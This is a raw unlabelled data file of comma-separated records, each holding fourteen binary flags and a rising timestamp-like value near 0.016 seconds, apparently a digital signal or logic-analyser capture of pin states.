1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5968148e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5968176e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5968180e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,1.5968228e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,1.5968248e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5968260e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5968276e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5968300e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5968324e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5968348e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5968376e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5968400e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5968428e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5968452e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5968476e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5968500e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5968524e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5968548e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5968576e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5968600e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5968628e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5968652e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5968676e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5968700e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5968724e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5968748e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5968776e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5968800e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5968828e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5968852e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5968876e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5968900e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5968924e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5968948e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5968980e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5969004e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5969028e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5969052e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,1.5969076e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,1.5969104e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,1,1.6092836e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,1.6093040e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,1,1.6093060e-02 0,1,0,1,0,0,0,0,0,0,0,1,0,1,1.6093088e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,1,1.6093116e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,1,1.6093388e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,1,1.6093412e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,1,1.6093416e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,1,1.6093436e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,1,1.6093460e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,1,1.6093484e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,1,1.6093508e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,1,1.6093532e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,1,1.6093556e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,1,1.6093584e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,1,1.6093608e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,1,1.6093616e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,1,1.6093636e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,1,1.6093660e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6093664e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6093684e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6093708e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6093732e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6093756e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6093764e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6093784e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6093808e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6093836e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6093860e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6093884e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6093908e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6093932e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6093956e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6093964e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6093984e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6094008e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6094036e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6094060e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6094084e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6094108e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6094116e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6094132e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6094156e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6094184e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6094208e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6094236e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6094260e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6094284e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6094308e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6094316e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6094332e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6094356e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6094384e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6094408e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6094436e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6094460e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6094464e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6094484e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6094508e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6094532e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6094556e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6094584e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6094608e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6094636e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6094660e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6094668e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6094684e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6094708e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6094732e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6094756e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6094812e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6094836e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6094884e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6094908e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6094960e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6094984e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6095036e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6095060e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6095108e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6095132e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6095184e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6095212e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6095236e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6095260e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6095264e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6095284e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6095308e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6095332e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6095356e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6095384e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6095408e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6095436e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6095460e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6095484e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6095508e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6095516e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6095532e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6095556e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6095584e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6095608e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6095636e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6095660e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6095684e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6095708e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6095732e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6095756e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6095784e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6095804e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6095812e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6095832e-02 0,1,0,1,0,1,0,0,0,0,0,0,0,0,1.6095860e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6095864e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6095884e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6095908e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6095932e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6095956e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6095984e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6096008e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6096012e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6096032e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6096060e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6096084e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6096108e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6096132e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6096156e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6096184e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6096208e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6096216e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6096232e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6096260e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6096284e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6096308e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6096360e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6096384e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6096436e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6096460e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6096508e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6096532e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6096584e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6096612e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6096660e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6096684e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6096732e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6096760e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6096784e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6096808e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6096812e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6096836e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6096860e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6096868e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6096884e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6096908e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6096916e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6096932e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6096956e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6096984e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6097008e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6097036e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6097060e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6097068e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6097084e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6097108e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6097132e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6097156e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6097184e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6097208e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6097212e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6097236e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6097260e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6097284e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6097308e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6097332e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6097356e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6097384e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6097408e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6097436e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6097460e-02 0,1,0,1,0,1,0,0,0,0,0,0,0,0,1.6097464e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6097468e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6097484e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6097508e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6097532e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6097556e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6097564e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6097584e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6097608e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6097636e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6097660e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6097684e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6097708e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6097732e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6097756e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6097784e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6097808e-02 0,1,0,1,0,1,0,0,0,0,0,0,0,0,1.6097812e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6097816e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6097836e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6097860e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6097864e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6097884e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6097908e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6097916e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6097932e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6097956e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6097984e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6098008e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6098036e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6098060e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6098084e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6098108e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6098116e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6098132e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6098156e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6098164e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6098184e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6098208e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6098212e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6098236e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6098260e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6098268e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6098284e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6098308e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6098332e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6098356e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6098384e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6098408e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6098436e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6098460e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6098464e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6098484e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6098508e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6098516e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6098532e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6098556e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6098584e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6098608e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6098612e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6098636e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6098660e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6098684e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6098708e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6098732e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6098756e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6098784e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6098808e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6098816e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6098832e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6098860e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6098884e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6098908e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6098916e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6098932e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6098956e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6098964e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6098984e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6099008e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6099032e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6099060e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6099084e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6099108e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6099132e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6099156e-02 0,1,0,1,0,0,0,0,0,1,0,0,0,0,1.6099160e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6099164e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6099184e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6099208e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6099216e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6099232e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6099260e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6099284e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6099308e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6099332e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6099356e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6099384e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6099408e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6099432e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6099460e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6099484e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6099508e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6099532e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6099556e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6099584e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6099608e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6099632e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6099660e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6099684e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6099708e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6099732e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6099756e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6099784e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6099808e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6099836e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6099860e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6099884e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6099908e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6099932e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6099956e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6099984e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6100008e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6100036e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6100060e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,1,1.6224740e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,1.6224964e-02 1,1,0,1,0,0,0,0,0,0,0,1,0,1,1.6224996e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,1.6225020e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,1,1.6225312e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,1.6225336e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,1,1.6225360e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,1.6225384e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,1,1.6225408e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,1.6225436e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,1,1.6225460e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,1.6225484e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,1,1.6225508e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,1.6225532e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,1,1.6225556e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6225572e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6225584e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6225612e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6225636e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6225660e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6225684e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6225708e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6225732e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6225760e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6225784e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6225812e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6225836e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6225860e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6225884e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6225908e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6225932e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6225960e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6225984e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6226012e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6226036e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6226060e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6226084e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6226108e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6226132e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6226160e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6226184e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6226212e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6226236e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6226260e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6226284e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6226308e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6226332e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6226360e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6226384e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6226412e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6226436e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6226460e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6226484e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6226508e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6226532e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6226560e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6226584e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6226612e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6226636e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,1.6226660e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,1.6226684e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6226688e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,1.6226708e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,1.6226732e-02 